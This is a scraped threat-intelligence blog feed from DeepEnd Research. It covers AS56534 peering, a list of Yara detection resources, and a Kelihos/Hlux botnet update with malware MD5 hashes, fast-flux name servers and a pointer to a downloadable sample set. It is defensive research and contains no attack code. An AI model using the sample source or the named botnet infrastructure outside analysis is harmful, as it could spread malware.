<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihvffWzumuk0JiVv5kPd9jVZi4VeZlLMCQAJY1imh99mIj_GukOJqUSVBeogXGiSvjfGh9cWFMZiCyRx_JEqfx5TZrRWIGYSq6gVjqIlK-4ltsLuak-sD3F22RlWsdfD7D5MP6Tg9VnAA/s1600/asn56534_may2013.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihvffWzumuk0JiVv5kPd9jVZi4VeZlLMCQAJY1imh99mIj_GukOJqUSVBeogXGiSvjfGh9cWFMZiCyRx_JEqfx5TZrRWIGYSq6gVjqIlK-4ltsLuak-sD3F22RlWsdfD7D5MP6Tg9VnAA/s320/asn56534_may2013.png" height="260" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS56534 - May, 2013</span></td></tr>
</tbody></table>
<span style="font-family: inherit;"><b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> <b><u><br />
</u></b> </span><br />
<span style="font-family: inherit;">In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">AS9002 - ReTN.net </span><br />
<span style="font-family: inherit;">AS3267 - RUNNET</span><br />
<span style="font-family: inherit;">AS50384 - W-IX_LTD</span><br />
<a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS56534&view=2.0"><span style="font-family: inherit;">CIDR Report for AS56534</span></a><br />
<span style="font-family: inherit;"><br /></span>
<br />
<a name='more'></a><span style="font-family: inherit;">DeepEnd Research will continue to report our findings and analysis of the malware and hosting infrastructure pertaining to CMS exploits. We also are working with victim organizations regarding any successful compromises detected. </span><br />
<span style="font-family: inherit;"><br />
Please feel free to contact us directly if you have anything you'd like to share, or if you would like further information from us.</span></div>
</div>
</div>
Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com2tag:blogger.com,1999:blog-74827929652568895.post-38060547272455794372013-02-25T17:44:00.002-05:002013-08-16T00:15:24.490-04:00Yara Resources<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9eSm17CPP_3TFBmeMzFLMybSWwahMG_L0vGxrnnG1itX6JYCschPkA5d-vBLru9Z02vkQmyOfValLmWdobj3IaGCfiKsYreRv0JGu2MgM1VJ2-xUaIDHS9x5UZn99hrONRNLSvt_5sXkU/s1600/yara.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9eSm17CPP_3TFBmeMzFLMybSWwahMG_L0vGxrnnG1itX6JYCschPkA5d-vBLru9Z02vkQmyOfValLmWdobj3IaGCfiKsYreRv0JGu2MgM1VJ2-xUaIDHS9x5UZn99hrONRNLSvt_5sXkU/s1600/yara.PNG" /></a><br />
<br />
<b><a href="https://code.google.com/p/yara-project/">Yara Project by Víctor Manuel Álvarez </a> </b><br />
<br />
<b><a href="http://www.deependresearch.org/2012/08/yara-signature-exchange-google-group.html">Yara Exchange Google Group</a> </b>- exchange yara signatures, tools, resources, and ideas. 170+ members as of Feb.2013<br />
<br />
<br />
<br />
<br />
<br />
<b>Notable Yara related publications by date:</b><br />
<ul>
<li>2013-08 <a href="http://yaragenerator.com/">http://yaragenerator.com/</a> YaraGenerator is an open-source toolset which allows for quick, effective, and automatic YARA signature creation from a number of malicious filetypesi (Executables, Office, PDF, Java, HTML, and more)</li>
<li>2013-02 <a href="http://sourceforge.net/projects/mastiff/?source=navbar">MASTIFF with Yara Plugin</a> by Klayton Monroe and Tyler Hudak. MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats. </li>
<li>2013-02 <a href="http://www.youtube.com/watch?v=mxGnjTlufAA&feature=youtu.be">Using Cuckoobox, Yara, Volatility and Hopper Disassembler to analyze APT1 malware</a> by Chort Z. Row</li>
<li>2012-01 <a href="http://rants.effu.se/2013/01/Installing-Latest-Yara-That-Works-With-Automake-1.11">Installing Latest Yara That Works With Automake-1.11</a> (Yara v1.7) by Chort</li>
<li>2013-01 <a href="http://resources.infosecinstitute.com/yara/">Yara – Rule-based malware detection and analysis </a>by Dejan Lukan </li>
<li>2013-01 <a href="https://github.com/MITRECND/yaraprocessor">Yaraprocessor</a> by Stephen DiCato -MITRE Yaraprocessor allows you to scan data streams in few unique ways. It supports scanning data streams in discrete chunks, or buffers. </li>
<li>2013-01 <a href="https://github.com/MITRECND/chopshop/blob/master/README.md">ChopShop</a> ChopShop is a MITRE developed framework to aid analysts in the creation and execution of pynids based decoders and detectors of APT tradecraft.</li>
<li>2013-02 <a href="http://www.securityflux.com/?p=98">Working with Yara.</a> Security Flux </li>
<li>2013-02 <a href="http://labs.alienvault.com/labs/index.php/tag/yara/">Yara Rules for APT1/Comment Crew malware arsenal</a></li>
<li>2013-01 <a href="https://github.com/hiddenillusion">Yara-goodies </a>by Hiddenillusion </li>
<li>2012-12 <a href="https://code.google.com/p/yara-editor/">Yara Editor</a> by Ivan Fontarensky</li>
<li>2012 <a href="https://code.google.com/p/malware-lu/source/browse/">Malware.lu Yara signatures for some malware samples</a></li>
<li>2012-10 <a href="https://github.com/aol/moloch">Moloch by AOL team</a> Moloch is a IPv4 packet capturing (PCAP), indexing and database system. A simple web interface is provided for PCAP browsing, searching, and exporting. Moloch is not meant to replace IDS engines but instead work along side them to store and index all the network traffic in standard PCAP format, providing fast access. Moloch is built to be deployed across many systems and can scale to handle multiple gigabits/sec of traffic</li>
<li>2012-12 <a href="https://github.com/jaimeblasco/AlienvaultLabs/commits/master/peid2yar">Peid signatures converted to Yara signatures</a> by AlienVault</li>
<li>2012-12 <a href="http://www.ossir.org/paris/supports/2012/2012-12-11/Saad_Kadhi-FBMWIAY-OSSIR_Paris-20121211.pdf">Fighting Back Malware with IOC & Yara </a>OSSIR Paris, 2012.12.11Saâd Kadhi</li>
<li>2012-12 <a href="https://github.com/ApoNie/G-Yara">G-Yara - a Web based (PHP) yara rule editor</a>. It's a handy way to test yara rules as you write them.</li>
<li>2012-11 <a href="http://blog.sei.cmu.edu/post.cfm/writing-effective-yara-signatures-to-identify-malware">Writing Effective YARA Signatures to Identify Malware</a> by David French</li>
<li>2012-10 <a href="https://github.com/chrislee35/yara-normalize/blob/master/README.rdoc">Yara-normalize</a> by Chris Lee. Normalizes Yara Signatures into a repeatable hash even when non-transforming changes are made. </li>
<li>2012-10 <a href="https://github.com/sroberts/peid4yara">Peid4yara is the conversion of the PEiD signatures to work with the active Yara Malware Classifer </a></li>
<li>2012-10 <a href="https://github.com/jaimeblasco/AlienvaultLabs/blob/master/yarad/README.md">Yarad and Ppyarad</a> - Yarad deploys a server that can be used to scan files and streams centrally with yara and your own ruleset. Pyarad allows you to interact with yarad server from your python scripts. AlienvaultLabs</li>
<li>2012-10 <a href="https://github.com/Xen0ph0n/MIDAS">MIDAS Metadata Inspection Database Alerting System</a> (This is a project to create a system to automate the inspection and databasing of all Meta data information contained within all files destined for an organization (generally via dumping the files which are attached to emails through the use of YARA, but could also be automated via netwitness, other full pcap tool, or just to iterate through file servers looking for suspicious files). Alternatively, this can be used to look for heuristic anomalies in existing collections of files both malicious and benign.</li>
<li>2012-08 <a href="http://www.youtube.com/watch?feature=player_embedded&v=CvGgqyfySDM#!">Create YARA Signature Demonstration video of the CreateYaraSignature.py </a></li>
<li>2012-08 <a href="http://blog.accuvantlabs.com/blog/case-b/making-ida-1-part-one-%E2%80%93-yara-signature-creation-1">Yara Signature Creation with IDA</a> by Case Barnes from AccuvantLabs</li>
<li>2012-07 <a href="http://code.google.com/p/volatility/wiki/CommandReferenceMal23#yarascan">Yarascan plugin for Volatility Framework</a></li>
<li>2012-04 <a href="http://joxeankoret.com/blog/2012/04/29/extracting-binary-patterns-in-malware-sets-and-generating-yara-rules/">Extracting Binary patterns in malware sets</a> (useful tool but has limitations on the number of files it will process and does not take into account the role of matching bytes that files share.</li>
<li>2011-01 <a href="http://0xdabbad00.com/2011/04/23/creating-a-yara-signature-for-shellcode/">Creating a Yara Signature for Shellcode </a></li>
<li>2011 <a href="http://my.safaribooksonline.com/book/networking/security/9780470613030/malware-classification/classification_with_yara">Converting ClamAV signatures for Yara</a> Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code Recipe 3-3 </li>
<li>2011-08 <a href="https://github.com/SpiderLabs/yara-ruby/blob/master/README.rdoc">Ruby bindings for the yara malware analysis library. Eric Monti</a></li>
<li>2011-12 <a href="https://github.com/fygrave/c_icap_yara">Yara C-ICAP Server Module</a> by Fyodor Grave </li>
<li>2011-11 <a href="http://hooked-on-mnemonics.blogspot.com/2011/01/intro-to-creating-anti-virus-signatures.html">An Intro to Creating Anti-Virus Signatures</a> by Alexander Hanel </li>
<li>2011-11 <a href="http://blog.zeltser.com/post/4339793582/custom-signatures-for-malware-scan">Tools to scan the file system with custom malware signatures</a> by Lenny Zeltser </li>
<li>2010 <a href="https://code.google.com/p/yara-project/downloads/list">UltraEdit and TextMate code highlighting bundles for Yara </a></li>
<li>2009 <a href="http://www.cutawaysecurity.com/blog/scout-sniper">Scout Sniper (scoutsniper)</a> is a wrapper program for the Yara malware identification and classification tool and the Fuzzy Hashing program ssdeep. scoutsniper is designed to run all of the files in a designated directory against a designated Yara Rule file or ssdeep’s Fuzzy dynamic linked library (fuzzy.dll).</li>
<li>2009 <a href="http://windowsir.blogspot.com/2009/01/got-your-yara.html">Got your YARA??</a> Windows Incident Response blog</li>
</ul>
</div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com2tag:blogger.com,1999:blog-74827929652568895.post-32759535170209780792013-02-10T17:47:00.003-05:002013-02-12T23:55:10.444-05:00Trojan Nap aka Kelihos/Hlux - Feb. 2013 Status Update<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator tr_bq" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8EsSTHebpewbaizIN7WKa1HD7lCVDF2z1Hldm-_p0wVyWt50V8TRfolCKwo4yeHPhssuoWad9QhobokAQ9RoEX8sjPH1MEgILdLt8muAV243ffrcdjGkzGCMxxFJC7PsJVoeLvu8ZkL0n/s1600/kel.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8EsSTHebpewbaizIN7WKa1HD7lCVDF2z1Hldm-_p0wVyWt50V8TRfolCKwo4yeHPhssuoWad9QhobokAQ9RoEX8sjPH1MEgILdLt8muAV243ffrcdjGkzGCMxxFJC7PsJVoeLvu8ZkL0n/s200/kel.PNG" width="193" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8EsSTHebpewbaizIN7WKa1HD7lCVDF2z1Hldm-_p0wVyWt50V8TRfolCKwo4yeHPhssuoWad9QhobokAQ9RoEX8sjPH1MEgILdLt8muAV243ffrcdjGkzGCMxxFJC7PsJVoeLvu8ZkL0n/s1600/kel.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><b>Update Feb 11, 2012 Regarding media headlines that it is a "new version": </b><br />
<i>Please note that this post is a "status update" on the growth of the Kelihos botnet. It is the same botnet and malware as we saw last year. The goal of the post is to highlight the rapid re-growth after the March 2012 takedown and share the recent known domain/name server data.</i><br />
<br />
FireEye posted details about the sleep function found in Kelihos/Hlux (<a href="http://blog.fireeye.com/research/2013/02/an-encounter-with-trojan-nap.html">An encounter with Trojan </a><a href="http://blog.fireeye.com/research/2013/02/an-encounter-with-trojan-nap.html">Nap</a>), which is interesting, and indeed is present in some of the samples we saw. The trojan, of course, has many more features, and most of them were documented in previous publications online. This post is a quick update on the state of Kelihos/Hlux botnet, along with the list of known fast flux domains (1500+) associated with with Kelihos distribution or Command&Control. (current > 2012). The current and most active name servers are pointing to the ns[1-6].boomsco.com, ns[1-6].larstor.com, and ns[1-6].zempakiv.ru which are also fast flux domains. The double fast flux nature of the botnet makes it very difficult to take down, and sinkholing is a temporary measure. Despite the two large attempts to take it down (Sep.2011 and Mar. 2012), the botnet is definitely on the rise again. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>Previously published research about Kelihos</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Feb. 2013 - <a href="http://blog.fireeye.com/research/2013/02/an-encounter-with-trojan-nap.html">An encounter with Trojan Nap - Fireeye</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Feb. 2013 - <a href="http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/backdoorwin32kelihos-trojanwin32genericbt">Backdoor.Win32. Kelihos - Lavasoft Analysis</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Jan. 2013 - <a href="http://www.symantec.com/connect/fr/blogs/waledac-gets-cozy-virut">Waledac Gets Cozy with Virut - Symantec (Symantec call Kelihos "Waledac (Kelihos)")</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Jan. 2013 - <a href="http://webcache.googleusercontent.com/search?q=cache:PwRwzhquo5wJ:portableapps.com/node/36169+&cd=2&hl=en&ct=clnk&gl=us">Beware of Kelihos-2? - Portable Apps</a> member note</span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Dec. 2012 - <a href="http://www.abuse.ch/?p=4878">A Quick Update On Spambot Kelihos - abuse.ch</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - <a href="http://www.honeynet.org/node/833">Kelihos.B/Hlux.B botnet takedown - Honeynet Project </a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - <a href="http://www.securelist.com/en/blog/208193431/Botnet_Shutdown_Success_Story_again_Disabling_the_new_Hlux_Kelihos_Botnet">Botnet Shutdown Success Story - again: Disabling the new Hlux/Kelihos Botnet</a> - Securelist</span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - </span><a href="http://blog.eset.com/2012/03/10/kelihos-not-alien-resurrection-more-attack-of-the-clones">Kelihos: not Alien Resurrection, more Attack of the Clones - ESET</a></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - <a href="http://www.securelist.com/en/blog/208193438/FAQ_Disabling_the_new_Hlux_Kelihos_Botnet">FAQ: Disabling the new Hlux/Kelihos Botnet - Securelist</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - <a href="http://www.abuse.ch/?p=3658">Kelihos Back In Town Using Fast Flux - Abuse.ch</a></span><br />
Feb. 2012 - <a href="http://community.websense.com/blogs/securitylabs/archive/2012/02/17/long-life-to-kelihos.aspx">Long life to Kelihos! - Websense / Gianluca Giuliani</a></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Feb. 2012 - <a href="http://www.securelist.com/en/blog/663/The_where_and_why_of_HLUX">The where and why of HLUX - Securelist</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Jan. 2012 - <a href="http://www.securelist.com/en/blog/655/Kelihos_Hlux_botnet_returns_with_new_techniques">Kelihos/Hlux botnet returns with new techniques - Securelist</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Sep. 2011 - <a href="http://www.securelist.com/en/blog/208193137/Botnet_Shutdown_Success_Story_How_Kaspersky_Lab_Disabled_the_Hlux_Kelihos_Botnet">Botnet Shutdown Success Story: How Kaspersky Lab Disabled the Hlux/Kelihos Botnet</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Sep. 2011 - <a href="http://blogs.technet.com/b/microsoft_blog/archive/2011/09/27/microsoft-neutralizes-kelihos-botnet-names-defendant-in-case.aspx?Redirected=true">Microsoft Neutralizes Kelihos Botnet, Names Defendant in Case</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Jan. 2011 - <a href="http://www.securelist.com/en/blog/11114/New_P2P_Botnet_Arising">New P2P Botnet Arising - Securelist</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Dec. 2010 - <a href="http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20101230">New Fast Flux Botnet for the Holidays: Could it be Storm Worm 3.0/Waledac 2.0? - Shadowserver</a></span>
<span style="font-family: inherit;"><span style="line-height: 19px;">
</span> <span style="line-height: 19px;">
</span> </span>
</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
List of recent MD5 hashes (you can download this sample set from <a href="http://contagiodump.blogspot.com/2013/02/trojan-nap-aka-kelihoshlux-status.html">Contagio</a>. There are<span style="font-family: inherit; line-height: 19px;"> 95 files). </span></div>
<div style="text-align: left;">
<span style="font-family: inherit; line-height: 19px;"><br /></span>
</div>
<div style="text-align: left;">
<div style="border: 8px double rgb(78, 150, 139); height: 280px; overflow: scroll; width: 500px;">
<span style="font-family: inherit;">01B43C0C8D620E8B88D846E4C9287CCD</span>
<span style="font-family: inherit;">036ADB0D4B856C2A5E16175BD089FF24</span>
<span style="font-family: inherit;">03F3B93A9B3D70D9BB9AD829A5F2361D</span>
<span style="font-family: inherit;">0481B4B12C8C69B735CAC2A918B52790</span>
<span style="font-family: inherit;">0530898731D7165DBABBF6BF252BA77E</span>
<span style="font-family: inherit;">08862142D7313A1D431D67E0E755EFC7</span>
<span style="font-family: inherit;">093586512549F2D016AD4C70F4F8E5C8</span>
<span style="font-family: inherit;">0BF067750C7406CF3373525DD09C293C</span>
<span style="font-family: inherit;">0C921935F0880B5C2161B3905F8A3069</span>
<span style="font-family: inherit;">0FEAAA4ADC31728E54B006AB9A7E6AFA</span>
<span style="font-family: inherit;">15B6DFADD045E8282C4927F8BDD69D3E</span>
<span style="font-family: inherit;">15B9C9632510FB4D387D4A02ABF830DD</span>
<span style="font-family: inherit;">1B342E6682167571B55AB59F3DD38D1E</span>
<span style="font-family: inherit;">1C04C6B4E0BBBC99CCEE489270C98622</span>
<span style="font-family: inherit;">1E08449CE5848B6ADFEE48B1582EAEEF</span><br />
<span style="font-family: inherit;">223D32E3F6BB9C5A6AD3CD58B898EFA1</span>
<span style="font-family: inherit;">223F7E425BD28AE13A54B2D0017D1E81</span>
<span style="font-family: inherit;">22AE2A6FF14C58265B5C79FBC25A91B6</span>
<span style="font-family: inherit;">2304FA9A6A67984CA0FF9E9BF561817A</span>
<span style="font-family: inherit;">23585DCBA9DFD4719ECC20B2D662D983</span>
<span style="font-family: inherit;">25B4C1C68C58D7D559E8682117D7C01F</span>
<span style="font-family: inherit;">288E85A4A7756268EBDED1F356531E03</span>
<span style="font-family: inherit;">28A417B0EA5BE796720463607F06CCC9</span>
<span style="font-family: inherit;">2B4A5F1C8225D9043AE1302DCCD7063B</span>
<span style="font-family: inherit;">2F091B59382F6CA9E1233EE38B171B2E</span>
<span style="font-family: inherit;">30EA180ECE416600DABC5ADA0F630D06</span>
<span style="font-family: inherit;">352A8AB0D5C7DB40F865B0E7E03B1D96</span>
<span style="font-family: inherit;">36C90E73120A419B4B00E66177040F43</span>
<span style="font-family: inherit;">3774D5BD50F4286531FEDF716D83FC6E</span>
<span style="font-family: inherit;">396B88D48CC04A8C37F4409F65EA8A97</span>
<span style="font-family: inherit;">3A76AA2439112479635D7172DB2440B1</span>
<span style="font-family: inherit;">3B6A3354B71CD674D4BC27646D270502</span>
<span style="font-family: inherit;">3D0F09DA5C5DBDB2124AEB0953F355B7</span>
<span style="font-family: inherit;">3D711B47C8FDE2C6A5E62D6AD0BA7BB5</span>
<span style="font-family: inherit;">44B342383E286465D74A838EE0780DDA</span>
<span style="font-family: inherit;">49B6D19F9307C3BBA460C936ADE26B70</span>
<span style="font-family: inherit;">4B6DFE2A4B0EF515275AC84B378D5F6F</span>
<span style="font-family: inherit;">4C2DB57ED5D27F54120765A9FA9C3BC7</span>
<span style="font-family: inherit;">51D3E04AF7E29A1E3A1748E03F0BD578</span>
<span style="font-family: inherit;">56AD23082E5E73AAEB95E5A915DF5444</span>
<span style="font-family: inherit;">5ACA74320003576F79CF6EDD0629CC13</span>
<span style="font-family: inherit;">5B947FEAA5BFA951C94B11BB9EEA9BC3</span>
<span style="font-family: inherit;">5BA7D2DE0CCC58F104240610BF297E6E</span>
<span style="font-family: inherit;">5BECB2498EA801ED010DD073007E20CE</span>
<span style="font-family: inherit;">5FFE38CA9FE07394D1BC5C270E83B253</span>
<span style="font-family: inherit;">63C926F659C3EDEC0B85C91898622A4D</span>
<span style="font-family: inherit;">69170C0C9FB4EEC6A630C4C9182505F0</span>
<span style="font-family: inherit;">6AA100C459E854A9A334B10468EAD014</span>
<span style="font-family: inherit;">6B873B6D21ECC9ADF7246D644B23FB84</span>
<span style="font-family: inherit;">6F6B016A5DB1791188D7C98A464292CC</span>
<span style="font-family: inherit;">70FD6A11E482D756BEF27546AA112206</span>
<span style="font-family: inherit;">72C1BEC266B23AF5CB12AE2F669D8784</span>
<span style="font-family: inherit;">7316D0EE9C0B6C23C7CEB2D04DC6B665</span>
<span style="font-family: inherit;">766A50581F6E47FF94126C5DBBD9FB01</span>
<span style="font-family: inherit;">76B7BB0CC2E3623078BF9E9A9A343CE1</span>
<span style="font-family: inherit;">77E2D2A1E508EA30D548293E2C36D64F</span>
<span style="font-family: inherit;">787F39D70D2BEC3139A6EA7690B88464</span>
<span style="font-family: inherit;">7E1B91800F2FE9974C7BB18A7097D933</span>
<span style="font-family: inherit;">7F7E0C58BDF1E47059DD84FFB301F6B7</span>
<span style="font-family: inherit;">8005E44761B842370D43299B29B0F16A</span>
<span style="font-family: inherit;">80E595253D3E02071D2564BA8296D308</span>
<span style="font-family: inherit;">84741D6DFFC996D35B8DC0A01111A5DE</span>
<span style="font-family: inherit;">9010DD12A1419E0F0098FD10CA324E23</span>
<span style="font-family: inherit;">9424EB9DE0558193A6B4D9607C23CBD5</span>
<span style="font-family: inherit;">9C075FB471DC66394090C8BFAA4739A4</span>
<span style="font-family: inherit;">9CA42C5B352DEFB53F8D30C16B36697A</span>
<span style="font-family: inherit;">A13B21423C5AE7BA318D0D26E672AD22</span>
<span style="font-family: inherit;">A15F02836309B819DE10068ED49D5D87</span>
<span style="font-family: inherit;">A56577564E52251C54B27D4CA62C266F</span>
<span style="font-family: inherit;">A78BE2345E524515E0DD1CCCA3C524F9</span>
<span style="font-family: inherit;">A8ABECD7C571AAEE6C964514133585F3</span>
<span style="font-family: inherit;">A910A324394B56022C7AC10DB22EC3F6</span>
<span style="font-family: inherit;">B1ABD1279A28F22B86A15D6DAFBC28A5</span>
<span style="font-family: inherit;">B568CF0982C867CD499F953E43738511</span>
<span style="font-family: inherit;">B63F25D5B02FE00D9423A7CCC0C3CCE2</span>
<span style="font-family: inherit;">B66475ED30943C0056C9402DCAECB8B9</span>
<span style="font-family: inherit;">BB5560123C62588988BC22C704CD9E03</span>
<span style="font-family: inherit;">C06414E1994BF4EFA41911CA81099411</span>
<span style="font-family: inherit;">C465888536A6785883079043F38143BD</span>
<span style="font-family: inherit;">C98F3F5709292D6D97AD96C1A8459A81</span>
<span style="font-family: inherit;">CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94</span>
<span style="font-family: inherit;">CCA50DCB8A30B325BF10CED5DAE4D51A</span>
<span style="font-family: inherit;">CE391D2B2036365D8943257FE1CB967E</span>
<span style="font-family: inherit;">D4CBEABAE5B4D4BAF14F554C8E9A4E86</span>
<span style="font-family: inherit;">DCE41A00FB703B6A6324CE4F4C4DB143</span>
<span style="font-family: inherit;">DE5FDBAD9274B21EA5391F48441D33D8</span>
<span style="font-family: inherit;">DEAF70F248599985FC32B083F16F251A</span>
<span style="font-family: inherit;">DF1A932144BF2C6E50FD090FDC1F1408</span>
<span style="font-family: inherit;">DFE01E12671BBDD7EC0F8BEBA08EC440</span>
<span style="font-family: inherit;">E2F8F5C80566BF32E1841B3C5A669D42</span>
<span style="font-family: inherit;">E453463A428A71A5DB19FC18807E747B</span>
<span style="font-family: inherit;">EB17EB2F02FA871C005C569B3299FCBA</span>
<span style="font-family: inherit;">EB4DBB18D00321A809A6C4D8594DDF5A</span>
<span style="font-family: inherit;">F5A6FC81A4F5AE6DEBFAC463DD49E1C2</span>
<span style="font-family: inherit;">F604C7E4EC3A12A83E0852A9D7FE75CA</span>
<span style="font-family: inherit;">F96EBF8128BFC6965C73A2659718C663</span>
<span style="font-family: inherit;">FE501F12B34701CF8AF5DD307C314862</span></div>
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;"><br /></span></span>
<span style="font-family: inherit;"><span style="text-align: left;"><span style="line-height: 19px;">List of files sorted by PE header Time Date stamp. It is not always indicative of age (and in this case all samples are recent -2013-2012) as the time stamp can be faked but can be </span></span><span style="line-height: 18.99147605895996px;">helpful for finding variants.</span></span><span style="font-family: inherit; text-align: left;"></span><br />
<span style="font-family: inherit;"><span style="line-height: 18.99147605895996px;"><br /></span></span>
<br />
<div style="border: 8px double rgb(78, 150, 139); height: 280px; overflow: scroll; width: 500px;">
1985-12<br />
84741D6DFFC996D35B8DC0A01111A5DE<br />
<br />
2009<br />
23585DCBA9DFD4719ECC20B2D662D983<br />
A78BE2345E524515E0DD1CCCA3C524F9<br />
<br />
2010-01<br />
03F3B93A9B3D70D9BB9AD829A5F2361D<br />
787F39D70D2BEC3139A6EA7690B88464<br />
<br />
2010-02<br />
5B947FEAA5BFA951C94B11BB9EEA9BC3<br />
<br />
2010-03<br />
288E85A4A7756268EBDED1F356531E03<br />
<br />
2010-04<br />
0530898731D7165DBABBF6BF252BA77E<br />
15B6DFADD045E8282C4927F8BDD69D3E<br />
<br />
2010-05<br />
B568CF0982C867CD499F953E43738511<br />
C465888536A6785883079043F38143BD<br />
CE391D2B2036365D8943257FE1CB967E<br />
<br />
2010-06<br />
036ADB0D4B856C2A5E16175BD089FF24<br />
28A417B0EA5BE796720463607F06CCC9<br />
<br />
2010-07<br />
51D3E04AF7E29A1E3A1748E03F0BD578<br />
70FD6A11E482D756BEF27546AA112206<br />
76B7BB0CC2E3623078BF9E9A9A343CE1<br />
<br />
2010-11<br />
3D0F09DA5C5DBDB2124AEB0953F355B7<br />
<br />
2010-12<br />
0FEAAA4ADC31728E54B006AB9A7E6AFA<br />
<br />
2011-01<br />
9424EB9DE0558193A6B4D9607C23CBD5<br />
DFE01E12671BBDD7EC0F8BEBA08EC440<br />
<br />
2011-02<br />
352A8AB0D5C7DB40F865B0E7E03B1D96<br />
BB5560123C62588988BC22C704CD9E03<br />
<br />
2011-04<br />
D4CBEABAE5B4D4BAF14F554C8E9A4E86<br />
<br />
2011-05<br />
1E08449CE5848B6ADFEE48B1582EAEEF<br />
B63F25D5B02FE00D9423A7CCC0C3CCE2<br />
C98F3F5709292D6D97AD96C1A8459A81<br />
<br />
2011-07<br />
B66475ED30943C0056C9402DCAECB8B9<br />
<br />
2011-08<br />
7F7E0C58BDF1E47059DD84FFB301F6B7<br />
DCE41A00FB703B6A6324CE4F4C4DB143<br />
F604C7E4EC3A12A83E0852A9D7FE75CA<br />
<br />
2011-09<br />
396B88D48CC04A8C37F4409F65EA8A97<br />
72C1BEC266B23AF5CB12AE2F669D8784<br />
77E2D2A1E508EA30D548293E2C36D64F<br />
9C075FB471DC66394090C8BFAA4739A4<br />
C06414E1994BF4EFA41911CA81099411<br />
DF1A932144BF2C6E50FD090FDC1F1408<br />
<br />
2011-10<br />
0C921935F0880B5C2161B3905F8A3069<br />
3D711B47C8FDE2C6A5E62D6AD0BA7BB5<br />
5ACA74320003576F79CF6EDD0629CC13<br />
<br />
2011-11<br />
2B4A5F1C8225D9043AE1302DCCD7063B<br />
3774D5BD50F4286531FEDF716D83FC6E<br />
5BA7D2DE0CCC58F104240610BF297E6E<br />
9CA42C5B352DEFB53F8D30C16B36697A<br />
<br />
2011-12<br />
E2F8F5C80566BF32E1841B3C5A669D42<br />
<br />
2012-01<br />
F96EBF8128BFC6965C73A2659718C663<br />
<br />
2012-02<br />
6F6B016A5DB1791188D7C98A464292CC<br />
<br />
2012-03<br />
093586512549F2D016AD4C70F4F8E5C8<br />
<br />
2012-04<br />
80E595253D3E02071D2564BA8296D308<br />
<br />
2012-06<br />
08862142D7313A1D431D67E0E755EFC7<br />
223D32E3F6BB9C5A6AD3CD58B898EFA1<br />
5BECB2498EA801ED010DD073007E20CE<br />
5FFE38CA9FE07394D1BC5C270E83B253<br />
A910A324394B56022C7AC10DB22EC3F6<br />
<br />
2012-07<br />
3B6A3354B71CD674D4BC27646D270502<br />
4C2DB57ED5D27F54120765A9FA9C3BC7<br />
<br />
2012-08<br />
2304FA9A6A67984CA0FF9E9BF561817A<br />
7316D0EE9C0B6C23C7CEB2D04DC6B665<br />
EB4DBB18D00321A809A6C4D8594DDF5A<br />
<br />
2012-10<br />
25B4C1C68C58D7D559E8682117D7C01F<br />
63C926F659C3EDEC0B85C91898622A4D<br />
6AA100C459E854A9A334B10468EAD014<br />
8005E44761B842370D43299B29B0F16A<br />
